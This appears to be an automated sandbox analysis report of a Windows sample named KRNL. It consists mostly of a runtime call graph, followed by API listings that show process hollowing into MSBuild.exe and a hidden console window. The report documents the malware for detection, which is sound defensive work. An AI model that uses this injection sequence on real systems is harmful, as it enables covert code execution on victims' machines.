std::_Lockit::~_Lockit LeaveCriticalSection 20567->20568 20569 7008fc 20568->20569 20569->20559 20569->20560 20571 6fc16a __Getctype 39 API calls 20570->20571 20572 6fdb07 20571->20572 20572->20547 20574 6fe11f GetCPInfo 20573->20574 20583 6fe1e8 20573->20583 20579 6fe137 20574->20579 20574->20583 20576 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20577 6fe29a 20576->20577 20577->20517 20584 6fd5a0 20579->20584 20583->20576 20585 6f297a __strnicoll 39 API calls 20584->20585 20586 6fd5c0 20585->20586 20604 6fbf5f 20586->20604 20588 6fd67c 20591 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20588->20591 20589 6fd674 20607 6efe0b 20589->20607 20590 6fd5ed 20590->20588 20590->20589 20594 6fbf11 __fread_nolock 15 API calls 20590->20594 20595 6fd612 __fread_nolock __alloca_probe_16 20590->20595 20592 6fd69f 20591->20592 20599 6fd6a1 20592->20599 20594->20595 20595->20589 20596 6fbf5f __fread_nolock MultiByteToWideChar 20595->20596 20597 6fd65b 20596->20597 20597->20589 20598 6fd662 GetStringTypeW 20597->20598 20598->20589 20600 6f297a __strnicoll 39 API calls 20599->20600 20611 6fbf89 20604->20611 20608 6efe26 20607->20608 20609 6efe15 20607->20609 20608->20588 20609->20608 20613 6f92d7 20609->20613 20612 6fbf7b MultiByteToWideChar 20611->20612 20612->20590 20614 6fbed7 ___free_lconv_mon 14 API calls 20613->20614 20653->20528 20664 6f8fc3 20654->20664 20656 6fe058 20657 6f8fc3 __fread_nolock 29 API calls 20656->20657 20658 6fe077 20657->20658 20659 6fbed7 ___free_lconv_mon 14 API calls 20658->20659 20660 6fe09e 20658->20660 20659->20660 20665 6f8fd4 20664->20665 20666 6f8fd0 codecvt 20664->20666 20667 6f8fdb 20665->20667 20671 6f8fee __fread_nolock 20665->20671 20666->20656 20668 6f76e4 __strnicoll 14 API calls 20667->20668 20669 6f8fe0 20668->20669 20670 6f7dcf __strnicoll 29 API calls 20669->20670 20670->20666 20671->20666 20672 6f901c 20671->20672 20673 6f9025 20671->20673 20674 6f76e4 __strnicoll 14 API 
calls 20672->20674 20673->20666 20675 6f76e4 __strnicoll 14 API calls 20673->20675 20676 6f9021 20674->20676 20675->20676 20680 6fbb68 20679->20680 20681 6fbb5a 20679->20681 20682 6f76e4 __strnicoll 14 API calls 20680->20682 20681->20680 20683 6fbb80 20681->20683 20687 6fbb70 20682->20687 20685 6fbb7a 20683->20685 20686 6f76e4 __strnicoll 14 API calls 20683->20686 20684 6f7dcf __strnicoll 29 API calls 20684->20685 20685->20328 20686->20687 20687->20684 20692 6f7bc3 20688->20692 20693 6f7be0 20688->20693 20689 6f7bda 20690 6fbed7 ___free_lconv_mon 14 API calls 20689->20690 20690->20693 20691 6fbed7 ___free_lconv_mon 14 API calls 20691->20692 20692->20689 20692->20691 20693->20329 20695 6f7e08 20694->20695 20696 6f7e30 CallUnexpected 8 API calls 20695->20696 20697 6f7e1d GetCurrentProcess TerminateProcess 20696->20697 20697->20335 20699 7032a0 20698->20699 20700 7032b1 20699->20700 20703 7032c4 ___from_strstr_to_strchr 20699->20703 20701 6f76e4 __strnicoll 14 API calls 20700->20701 20711 7032b6 20701->20711 20702 7034db 20705 6f76e4 __strnicoll 14 API calls 20702->20705 20703->20702 20704 7032e4 20703->20704 20761 703500 20704->20761 20707 7034e0 20705->20707 20709 6fbed7 ___free_lconv_mon 14 API calls 20707->20709 20709->20711 20710 703328 20713 703314 20710->20713 20765 70351a 20710->20765 20711->20284 20712 70332a 20712->20713 20717 6fd2b4 __Getctype 14 API calls 20712->20717 20719 6fbed7 ___free_lconv_mon 14 API calls 20713->20719 20714 703306 20722 703323 20714->20722 20723 70330f 20714->20723 20718 703338 20717->20718 20721 6fbed7 ___free_lconv_mon 14 API calls 20718->20721 20719->20711 20720 70339d 20724 6fbed7 ___free_lconv_mon 14 API calls 20720->20724 20725 703343 20721->20725 20727 703500 39 API calls 20722->20727 20726 6f76e4 __strnicoll 14 API calls 20723->20726 20733 7033a5 20724->20733 20725->20710 20725->20713 20731 6fd2b4 __Getctype 14 API calls 20725->20731 20726->20713 20727->20710 20728 7033e8 20728->20713 20729 7028b5 std::ios_base::_Init 32 API 
calls 20728->20729 20730 703416 20729->20730 20732 6fbed7 ___free_lconv_mon 14 API calls 20730->20732 20734 70335f 20731->20734 20738 7033d2 20732->20738 20733->20738 20769 7028b5 20733->20769 20737 6fbed7 ___free_lconv_mon 14 API calls 20734->20737 20735 6fbed7 ___free_lconv_mon 14 API calls 20735->20711 20737->20710 20738->20713 20738->20738 20741 6fd2b4 __Getctype 14 API calls 20738->20741 20758 7034d0 20738->20758 20739 7033c9 20740 6fbed7 ___free_lconv_mon 14 API calls 20739->20740 20740->20738 20742 703461 20741->20742 20743 703471 20742->20743 20744 703469 20742->20744 20746 6fbb4c ___std_exception_copy 29 API calls 20743->20746 20745 6fbed7 ___free_lconv_mon 14 API calls 20744->20745 20745->20713 20747 70347d 20746->20747 20748 703484 20747->20748 20749 7034f5 20747->20749 20778 70a23c 20748->20778 20751 6f7dfc __Getctype 11 API calls 20749->20751 20752 7034ff 20751->20752 20754 7034ca 20756 6fbed7 ___free_lconv_mon 14 API calls 20754->20756 20755 7034ab 20757 6f76e4 __strnicoll 14 API calls 20755->20757 20756->20758 20758->20735 20762 7032ef 20761->20762 20763 70350d 20761->20763 20762->20710 20762->20712 20762->20714 20793 70356f 20763->20793 20766 70338d 20765->20766 20768 703530 20765->20768 20766->20720 20766->20728 20768->20766 20808 70a14b 20768->20808 20770 7028c2 20769->20770 20771 7028dd 20769->20771 20770->20771 20773 7028ce 20770->20773 20772 7028ec 20771->20772 20842 709a54 20771->20842 20849 7062a0 20772->20849 20775 6f76e4 __strnicoll 14 API calls 20773->20775 20777 7028d3 __fread_nolock 20775->20777 20777->20739 20861 6fd275 20778->20861 20783 70a2af 20785 6fbed7 ___free_lconv_mon 14 API calls 20783->20785 20787 70a2bb 20783->20787 20784 6fd275 39 API calls 20786 70a28c 20784->20786 20785->20787 20789 6f2a74 17 API calls 20786->20789 20788 6fbed7 ___free_lconv_mon 14 API calls 20787->20788 20790 7034a5 20787->20790 20788->20790 20791 70a299 20789->20791 20790->20754 20790->20755 20791->20783 20792 70a2a3 SetEnvironmentVariableW 20791->20792 
20792->20783 20794 703582 20793->20794 20795 70357d 20793->20795 20796 6fd2b4 __Getctype 14 API calls 20794->20796 20795->20762 20797 70359f 20796->20797 20798 70360d 20797->20798 20801 703612 20797->20801 20804 6fd2b4 __Getctype 14 API calls 20797->20804 20805 6fbed7 ___free_lconv_mon 14 API calls 20797->20805 20806 6fbb4c ___std_exception_copy 29 API calls 20797->20806 20807 7035fc 20797->20807 20799 6f8353 CallUnexpected 39 API calls 20798->20799 20799->20801 20800 6fbed7 ___free_lconv_mon 14 API calls 20800->20795 20802 6f7dfc __Getctype 11 API calls 20801->20802 20803 70361e 20802->20803 20804->20797 20805->20797 20806->20797 20807->20800 20809 70a15f 20808->20809 20810 70a159 20808->20810 20809->20768 20811 70a973 20810->20811 20812 70a9bb 20810->20812 20814 70a979 20811->20814 20817 70a996 20811->20817 20824 70a9d1 20812->20824 20816 6f76e4 __strnicoll 14 API calls 20814->20816 20815 70a989 20815->20768 20818 70a97e 20816->20818 20820 6f76e4 __strnicoll 14 API calls 20817->20820 20823 70a9b4 20817->20823 20819 6f7dcf __strnicoll 29 API calls 20818->20819 20819->20815 20821 70a9a5 20820->20821 20822 6f7dcf __strnicoll 29 API calls 20821->20822 20822->20815 20823->20768 20825 70a9e1 20824->20825 20826 70a9fb 20824->20826 20827 6f76e4 __strnicoll 14 API calls 20825->20827 20828 70aa03 20826->20828 20829 70aa1a 20826->20829 20830 70a9e6 20827->20830 20831 6f76e4 __strnicoll 14 API calls 20828->20831 20832 70aa26 20829->20832 20833 70aa3d 20829->20833 20834 6f7dcf __strnicoll 29 API calls 20830->20834 20835 70aa08 20831->20835 20836 6f76e4 __strnicoll 14 API calls 20832->20836 20837 6f297a __strnicoll 39 API calls 20833->20837 20841 70a9f1 20833->20841 20834->20841 20838 6f7dcf __strnicoll 29 API calls 20835->20838 20839 70aa2b 20836->20839 20837->20841 20838->20841 20840 6f7dcf __strnicoll 29 API calls 20839->20840 20840->20841 20841->20815 20843 709a74 HeapSize 20842->20843 20844 709a5f 20842->20844 20843->20772 20845 6f76e4 __strnicoll 14 API calls 
20844->20845 20846 709a64 20845->20846 20847 6f7dcf __strnicoll 29 API calls 20846->20847 20848 709a6f 20847->20848 20848->20772 20850 7062b8 20849->20850 20851 7062ad 20849->20851 20853 7062c0 20850->20853 20859 7062c9 __Getctype 20850->20859 20852 6fbf11 __fread_nolock 15 API calls 20851->20852 20857 7062b5 20852->20857 20854 6fbed7 ___free_lconv_mon 14 API calls 20853->20854 20854->20857 20855 7062f3 HeapReAlloc 20855->20857 20855->20859 20856 7062ce 20858 6f76e4 __strnicoll 14 API calls 20856->20858 20857->20777 20858->20857 20859->20855 20859->20856 20860 6f5877 std::ios_base::_Init 2 API calls 20859->20860 20860->20859 20862 6f297a __strnicoll 39 API calls 20861->20862 20863 6fd287 20862->20863 20864 6fd299 20863->20864 20869 6fca46 20863->20869 20866 6f2a74 20864->20866 20875 6f2acc 20866->20875 20872 6fd05b 20869->20872 20873 6fcfd6 std::_Lockit::_Lockit 5 API calls 20872->20873 20874 6fca4e 20873->20874 20874->20864 20876 6f2ada 20875->20876 20877 6f2af4 20875->20877 20893 6f2a5a 20876->20893 20879 6f2b1a 20877->20879 20881 6f2afb 20877->20881 20880 6fbf5f __fread_nolock MultiByteToWideChar 20879->20880 20882 6f2b29 20880->20882 20885 6f2a8c 20881->20885 20897 6f2a1b 20881->20897 20884 6f2b30 GetLastError 20882->20884 20887 6f2b56 20882->20887 20889 6f2a1b 15 API calls 20882->20889 20902 6f770a 20884->20902 20885->20783 20885->20784 20887->20885 20890 6fbf5f __fread_nolock MultiByteToWideChar 20887->20890 20889->20887 20892 6f2b6d 20890->20892 20892->20884 20892->20885 20894 6f2a65 20893->20894 20895 6f2a6d 20893->20895 20896 6fbed7 ___free_lconv_mon 14 API calls 20894->20896 20895->20885 20896->20895 20898 6f2a5a 14 API calls 20897->20898 20899 6f2a29 20898->20899 20907 6f29fc 20899->20907 20910 6f76f7 20902->20910 20908 6fbf11 __fread_nolock 15 API calls 20907->20908 20909 6f2a09 20908->20909 20909->20885 20911 6fc2bb __strnicoll 14 API calls 20910->20911 20914 6ea668 _Yarn 20913->20914 20915 6e24f3 20914->20915 20916 6f5877 std::ios_base::_Init 2 API 
calls 20914->20916 20917 6ea684 20914->20917 20924 6f5349 20915->20924 20916->20914 20918 6ef338 std::ios_base::_Init 20917->20918 20919 6ea68e Concurrency::cancel_current_task 20917->20919 20920 6f060c CallUnexpected RaiseException 20918->20920 20951 6f060c 20919->20951 20921 6ef354 20920->20921 20923 6eb4ce 20925 6f536a 20924->20925 20926 6f5356 20924->20926 20954 6f53da 20925->20954 20928 6f76e4 __strnicoll 14 API calls 20926->20928 20930 6f535b 20928->20930 20931 6f7dcf __strnicoll 29 API calls 20930->20931 20933 6f5366 20931->20933 20932 6f537f CreateThread 20934 6f539e GetLastError 20932->20934 20935 6f53aa 20932->20935 20971 6f5470 20932->20971 20933->20131 20936 6f770a __dosmaperr 14 API calls 20934->20936 20963 6f542a 20935->20963 20936->20935 20940 6e253a 20939->20940 20941 6ef134 20939->20941 20940->20142 20940->20144 20942 6ef13b GetExitCodeThread 20941->20942 20943 6ef151 CloseHandle 20941->20943 20942->20940 20944 6ef14c 20942->20944 20943->20940 20944->20943 20946 6eb32d std::_Throw_Cpp_error 20945->20946 21010 6eb352 20946->21010 20952 6f0626 20951->20952 20953 6f0654 RaiseException 20951->20953 20952->20953 20953->20923 20955 6fd2b4 __Getctype 14 API calls 20954->20955 20956 6f53eb 20955->20956 20957 6fbed7 ___free_lconv_mon 14 API calls 20956->20957 20958 6f53f8 20957->20958 20959 6f53ff GetModuleHandleExW 20958->20959 20960 6f541c 20958->20960 20959->20960 20961 6f542a 16 API calls 20960->20961 20962 6f5376 20961->20962 20962->20932 20962->20935 20964 6f5436 20963->20964 20970 6f53b5 20963->20970 20965 6f543c CloseHandle 20964->20965 20966 6f5445 20964->20966 20965->20966 20967 6f544b FreeLibrary 20966->20967 20968 6f5454 20966->20968 20967->20968 20969 6fbed7 ___free_lconv_mon 14 API calls 20968->20969 20969->20970 20970->20131 20972 6f547c ___scrt_is_nonwritable_in_current_image 20971->20972 20973 6f5483 GetLastError ExitThread 20972->20973 20974 6f5490 20972->20974 20975 6fc16a __Getctype 39 API calls 20974->20975 20976 6f5495 20975->20976 
20985 6ff767 20976->20985 20979 6f54ac 20989 6f53cc 20979->20989 20986 6ff777 CallUnexpected 20985->20986 20987 6f54a0 20985->20987 20986->20987 20995 6fce89 20986->20995 20987->20979 20992 6fcde0 20987->20992 20998 6f54ee 20989->20998 20993 6fcfd6 std::_Lockit::_Lockit 5 API calls 20992->20993 20994 6fcdfc 20993->20994 20994->20979 20996 6fcfd6 std::_Lockit::_Lockit 5 API calls 20995->20996 20997 6fcea5 20996->20997 20997->20987 20999 6fc2bb __strnicoll 14 API calls 20998->20999 21001 6f54f9 20999->21001 21000 6f553b ExitThread 21001->21000 21002 6f5512 21001->21002 21007 6fce1b 21001->21007 21004 6f5525 21002->21004 21005 6f551e CloseHandle 21002->21005 21004->21000 21006 6f5531 FreeLibraryAndExitThread 21004->21006 21005->21004 21006->21000 21008 6fcfd6 std::_Lockit::_Lockit 5 API calls 21007->21008 21009 6fce34 21008->21009 21009->21002 21011 6eb35e __EH_prolog3_GS 21010->21011 21018 6eb281 21011->21018 21015 6eb387 std::_Throw_Cpp_error 21039 6efb97 21015->21039 21019 6eb29e 21018->21019 21019->21019 21042 6eb39f 21019->21042 21021 6eb2b2 21022 6e3430 21021->21022 21023 6e345e 21022->21023 21024 6e358b 21023->21024 21025 6e3468 21023->21025 21026 6e2600 std::_Throw_Cpp_error 30 API calls 21024->21026 21027 6e3470 codecvt 21025->21027 21028 6e34bd 21025->21028 21029 6e34a4 21025->21029 21037 6e3530 21026->21037 21086 6e35a0 21027->21086 21030 6ea663 std::ios_base::_Init 3 API calls 21028->21030 21033 6ea663 std::ios_base::_Init 3 API calls 21029->21033 21030->21027 21033->21027 21035 6e34f9 21036 6f0bf6 ___std_exception_copy 29 API calls 21035->21036 21036->21037 21038 6e355c std::ios_base::_Ios_base_dtor 21037->21038 21097 6f7ddf 21037->21097 21038->21015 21040 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21039->21040 21041 6efba1 21040->21041 21041->21041 21043 6eb417 21042->21043 21046 6eb3b6 std::_Throw_Cpp_error 21042->21046 21057 6e2600 21043->21057 21048 6eb3bd std::_Throw_Cpp_error codecvt 21046->21048 21049 6eb449 
21046->21049 21048->21021 21050 6eb455 21049->21050 21051 6eb453 21049->21051 21052 6eb45d 21050->21052 21053 6eb464 21050->21053 21051->21048 21060 6eb46c 21052->21060 21054 6ea663 std::ios_base::_Init 3 API calls 21053->21054 21056 6eb462 21054->21056 21056->21048 21075 6eb4cf 21057->21075 21061 6eb47d 21060->21061 21062 6e2610 21060->21062 21063 6ea663 std::ios_base::_Init 3 API calls 21061->21063 21064 6f060c CallUnexpected RaiseException 21062->21064 21065 6eb483 21063->21065 21066 6e2642 21064->21066 21065->21056 21069 6f0bf6 21066->21069 21070 6f0c03 _Yarn 21069->21070 21074 6e2678 21069->21074 21071 6f0c30 21070->21071 21072 6fbb4c ___std_exception_copy 29 API calls 21070->21072 21070->21074 21073 6f92d7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 21071->21073 21072->21071 21073->21074 21074->21056 21080 6eb59a 21075->21080 21078 6f060c CallUnexpected RaiseException 21079 6eb4ee 21078->21079 21083 6eb14d 21080->21083 21084 6f0bf6 ___std_exception_copy 29 API calls 21083->21084 21085 6eb179 21084->21085 21085->21078 21087 6e35dd 21086->21087 21089 6e361a 21086->21089 21087->21089 21102 6e3790 21087->21102 21090 6e3790 std::_Throw_Cpp_error 30 API calls 21089->21090 21091 6e36b0 codecvt 21089->21091 21090->21091 21092 6e36fc std::ios_base::_Ios_base_dtor 21091->21092 21093 6f7ddf std::_Throw_Cpp_error 29 API calls 21091->21093 21092->21035 21094 6e374a 21093->21094 21116 6e1460 21094->21116 21096 6e375f 21096->21035 21098 6f801e __strnicoll 29 API calls 21097->21098 21099 6f7dee 21098->21099 21100 6f7dfc __Getctype 11 API calls 21099->21100 21101 6f7dfb 21100->21101 21103 6e38d5 21102->21103 21108 6e37ad 21102->21108 21104 6e2600 std::_Throw_Cpp_error 30 API calls 21103->21104 21114 6e37dc codecvt 21104->21114 21105 6e37d1 21106 6ea663 std::ios_base::_Init 3 API calls 21105->21106 21106->21114 21107 6f7ddf std::_Throw_Cpp_error 29 API calls 21109 6e38df 21107->21109 21108->21105 21110 6e38c1 21108->21110 21112 6e38bc 21108->21112 21108->21114 21113 
6ea663 std::ios_base::_Init 3 API calls 21110->21113 21111 6e3841 std::ios_base::_Ios_base_dtor codecvt 21111->21089 21120 6e2610 21112->21120 21113->21114 21114->21107 21114->21111 21117 6e1486 std::ios_base::_Ios_base_dtor 21116->21117 21118 6e146c 21116->21118 21117->21096 21118->21117 21119 6f7ddf std::_Throw_Cpp_error 29 API calls 21118->21119 21119->21118 21121 6f060c CallUnexpected RaiseException 21120->21121 21122 6e2642 21121->21122 21123 6f0bf6 ___std_exception_copy 29 API calls 21122->21123 21124 6e2678 21123->21124 21124->21110 21126 6f56cf 21125->21126 21127 6f56bd 21125->21127 21137 6f582a 21126->21137 21129 6ef896 CallUnexpected GetModuleHandleW 21127->21129 21131 6f56c2 21129->21131 21131->21126 21152 6f55c4 GetModuleHandleExW 21131->21152 21132 6f048b 21132->20171 21138 6f5836 ___scrt_is_nonwritable_in_current_image 21137->21138 21158 6f80e1 EnterCriticalSection 21138->21158 21140 6f5840 21159 6f5727 21140->21159 21142 6f584d 21163 6f586b 21142->21163 21145 6f565f 21188 6f5646 21145->21188 21147 6f5669 21148 6f567d 21147->21148 21149 6f566d GetCurrentProcess TerminateProcess 21147->21149 21150 6f55c4 CallUnexpected 3 API calls 21148->21150 21149->21148 21151 6f5685 ExitProcess 21150->21151 21153 6f5624 21152->21153 21154 6f5603 GetProcAddress 21152->21154 21155 6f562a FreeLibrary 21153->21155 21156 6f5633 21153->21156 21154->21153 21157 6f5617 21154->21157 21155->21156 21156->21126 21157->21153 21158->21140 21160 6f5733 ___scrt_is_nonwritable_in_current_image CallUnexpected 21159->21160 21162 6f5797 CallUnexpected 21160->21162 21166 6f73fe 21160->21166 21162->21142 21187 6f80f8 LeaveCriticalSection 21163->21187 21165 6f5706 21165->21132 21165->21145 21167 6f740a __EH_prolog3 21166->21167 21170 6f7689 21167->21170 21169 6f7431 Concurrency::details::_ContextCallback::_CallInContext 21169->21162 21171 6f7695 ___scrt_is_nonwritable_in_current_image 21170->21171 21178 6f80e1 EnterCriticalSection 21171->21178 21173 6f76a3 21179 6f7554 21173->21179 
21178->21173 21180 6f7573 21179->21180 21181 6f756b 21179->21181 21180->21181 21182 6fbed7 ___free_lconv_mon 14 API calls 21180->21182 21183 6f76d8 21181->21183 21182->21181 21186 6f80f8 LeaveCriticalSection 21183->21186 21185 6f76c1 21185->21169 21186->21185 21187->21165 21191 6ff740 21188->21191 21190 6f564b CallUnexpected 21190->21147 21192 6ff74f CallUnexpected 21191->21192 21193 6ff75c 21192->21193 21195 6fce49 21192->21195 21193->21190 21196 6fcfd6 std::_Lockit::_Lockit 5 API calls 21195->21196 21197 6fce65 21196->21197 21197->21193 21200 6f324d 21198->21200 21201 6f325f ___scrt_uninitialize_crt 21198->21201 21199 6f325b 21199->20164 21200->21199 21203 6f854a 21200->21203 21201->20164 21206 6f8675 21203->21206 21209 6f874e 21206->21209 21210 6f875a ___scrt_is_nonwritable_in_current_image 21209->21210 21217 6f80e1 EnterCriticalSection 21210->21217 21212 6f87d0 21226 6f87ee 21212->21226 21215 6f8764 ___scrt_uninitialize_crt 21215->21212 21218 6f86c2 21215->21218 21217->21215 21219 6f86ce ___scrt_is_nonwritable_in_current_image 21218->21219 21229 6f3315 EnterCriticalSection 21219->21229 21221 6f86d8 ___scrt_uninitialize_crt 21225 6f8711 21221->21225 21230 6f8553 21221->21230 21241 6f8742 21225->21241 21342 6f80f8 LeaveCriticalSection 21226->21342 21228 6f8551 21228->21199 21229->21221 21231 6f8568 _Fputc 21230->21231 21232 6f856f 21231->21232 21233 6f857a 21231->21233 21234 6f8675 ___scrt_uninitialize_crt 68 API calls 21232->21234 21244 6f85b8 21233->21244 21341 6f3329 LeaveCriticalSection 21241->21341 21243 6f8730 21243->21215 21341->21243 21342->21228 21343 6eb060 21366 6eafc4 GetModuleHandleExW 21343->21366 21346 6eb0a6 21348 6eafc4 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21346->21348 21350 6eb0ac 21348->21350 21352 6eb0cd 21350->21352 21383 6eafa7 GetModuleHandleExW 21350->21383 21368 6e7770 21352->21368 21354 6eb0bd 21354->21352 21355 6eb0c3 FreeLibraryWhenCallbackReturns 21354->21355 21355->21352 21356 6eb0dd 21357 6eafc4 
Concurrency::details::_Reschedule_chore GetModuleHandleExW 21356->21357 21358 6eb0e3 21357->21358 21359 6eb111 21358->21359 21360 6eaefa 37 API calls 21358->21360 21361 6eb0ef 21360->21361 21362 6eefd2 ReleaseSRWLockExclusive 21361->21362 21363 6eb102 21362->21363 21363->21359 21384 6ee95d WakeAllConditionVariable 21363->21384 21367 6eafda 21366->21367 21367->21346 21374 6eaefa 21367->21374 21369 6e77af 21368->21369 21385 6e8aa0 21369->21385 21370 6e77b9 21390 6eaf64 21370->21390 21372 6e77cb 21372->21356 21375 6eefc1 12 API calls 21374->21375 21376 6eaf03 21375->21376 21377 6eb317 std::_Throw_Cpp_error 30 API calls 21376->21377 21378 6eaf17 21376->21378 21379 6eaf20 21377->21379 21380 6eefd2 21378->21380 21381 6eefdf ReleaseSRWLockExclusive 21380->21381 21382 6eefed 21380->21382 21381->21382 21382->21346 21383->21354 21384->21359 21386 6e8add 21385->21386 21387 6e8ae8 21386->21387 21393 6e90e0 21386->21393 21410 6e90f0 21386->21410 21387->21370 21391 6eaf7b 21390->21391 21392 6eaf70 CloseThreadpoolWork 21390->21392 21391->21372 21392->21391 21394 6e90ea 21393->21394 21426 6eefc1 21394->21426 21397 6e9136 21399 6e91ce 21397->21399 21400 6e9143 21397->21400 21398 6e91c7 21401 6eb317 std::_Throw_Cpp_error 30 API calls 21398->21401 21404 6eb317 std::_Throw_Cpp_error 30 API calls 21399->21404 21402 6e914b 21400->21402 21403 6e9174 21400->21403 21401->21399 21405 6eefd2 ReleaseSRWLockExclusive 21402->21405 21407 6eefd2 ReleaseSRWLockExclusive 21403->21407 21406 6e9151 std::_Throw_Cpp_error 21404->21406 21405->21406 21406->21387 21408 6e9181 21407->21408 21429 6e92f0 21408->21429 21411 6eefc1 12 API calls 21410->21411 21412 6e912b 21411->21412 21413 6e9136 21412->21413 21414 6e91c7 21412->21414 21415 6e91ce 21413->21415 21416 6e9143 21413->21416 21417 6eb317 std::_Throw_Cpp_error 30 API calls 21414->21417 21420 6eb317 std::_Throw_Cpp_error 30 API calls 21415->21420 21418 6e914b 21416->21418 21419 6e9174 21416->21419 21417->21415 21421 6eefd2 ReleaseSRWLockExclusive 
21418->21421 21423 6eefd2 ReleaseSRWLockExclusive 21419->21423 21422 6e9151 std::_Throw_Cpp_error 21420->21422 21421->21422 21422->21387 21424 6e9181 21423->21424 21425 6e92f0 66 API calls 21424->21425 21425->21422 21436 6eeff1 GetCurrentThreadId 21426->21436 21462 6e9620 21429->21462 21433 6e939f 21471 6e9400 21433->21471 21437 6ef03a 21436->21437 21438 6ef01b 21436->21438 21440 6ef05a 21437->21440 21441 6ef043 21437->21441 21439 6ef020 AcquireSRWLockExclusive 21438->21439 21447 6ef030 21438->21447 21439->21447 21443 6ef0b9 21440->21443 21449 6ef072 21440->21449 21442 6ef04e AcquireSRWLockExclusive 21441->21442 21441->21447 21442->21447 21445 6ef0c0 TryAcquireSRWLockExclusive 21443->21445 21443->21447 21444 6ea6e1 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21446 6e912b 21444->21446 21445->21447 21446->21397 21446->21398 21447->21444 21449->21447 21450 6ef0a9 TryAcquireSRWLockExclusive 21449->21450 21451 6efdcd 21449->21451 21450->21447 21450->21449 21454 6efda6 21451->21454 21453 6efdd8 __aulldiv __aullrem 21453->21449 21457 6f00b4 21454->21457 21458 6f00e4 GetSystemTimePreciseAsFileTime 21457->21458 21459 6f00f0 GetSystemTimeAsFileTime 21457->21459 21460 6efdb4 21458->21460 21459->21460 21460->21453 21463 6e9667 21462->21463 21464 6ea663 std::ios_base::_Init 3 API calls 21463->21464 21465 6e935f 21464->21465 21466 6e94f0 21465->21466 21467 6e9536 std::_Throw_Cpp_error 21466->21467 21470 6e9540 std::_Throw_Cpp_error 21467->21470 21496 6eb57d 21467->21496 21470->21433 21472 6eefc1 12 API calls 21471->21472 21473 6e9418 21472->21473 21474 6e94c6 21473->21474 21475 6e94cd 21473->21475 21477 6e9438 21473->21477 21478 6e9443 21473->21478 21476 6eb317 std::_Throw_Cpp_error 30 API calls 21474->21476 21479 6eb317 std::_Throw_Cpp_error 30 API calls 21475->21479 21476->21475 21480 6eefd2 ReleaseSRWLockExclusive 21477->21480 21481 6eefd2 ReleaseSRWLockExclusive 21478->21481 21482 6e94db 21479->21482 21483 6e93ae 21480->21483 21484 6e9450 

                                                                                                                                                                                                                                                          APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0071A110,0071A100), ref: 0071A334
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0071A347
• Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 0071A365
• ReadProcessMemory.KERNELBASE(00000094,?,0071A154,00000004,00000000), ref: 0071A389
• VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 0071A3B4
• WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 0071A40C
• WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 0071A457
• WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 0071A495
• Wow64SetThreadContext.KERNEL32(00000098,006C0000), ref: 0071A4D1
• ResumeThread.KERNELBASE(00000098), ref: 0071A4E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2687962208-3857624555

Control-flow Graph

APIs
  • Part of subcall function 006E1240: _strlen.LIBCMT ref: 006E12BA
• CreateFileA.KERNELBASE ref: 006E2036
• GetFileSize.KERNEL32(00000000,00000000), ref: 006E2046
• ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 006E206B
• CloseHandle.KERNELBASE(00000000), ref: 006E207A
• _strlen.LIBCMT ref: 006E20CD
• CloseHandle.KERNEL32(00000000), ref: 006E21FD
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: File$CloseHandle_strlen$CreateReadSize
• String ID:
• API String ID: 2911764282-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID:
• String ID: pp
• API String ID: 0-2122341976

Control-flow Graph

APIs
• GetConsoleWindow.KERNELBASE ref: 006E24DD
• ShowWindow.USER32(00000000,00000000), ref: 006E24E6
• GetCurrentThreadId.KERNEL32 ref: 006E2524
  • Part of subcall function 006EF11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
  • Part of subcall function 006EF11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
  • Part of subcall function 006EF11D: CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
• std::_Throw_Cpp_error.LIBCPMT ref: 006E2567
• std::_Throw_Cpp_error.LIBCPMT ref: 006E2578
• std::_Throw_Cpp_error.LIBCPMT ref: 006E2589
• std::_Throw_Cpp_error.LIBCPMT ref: 006E259A
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
• String ID:
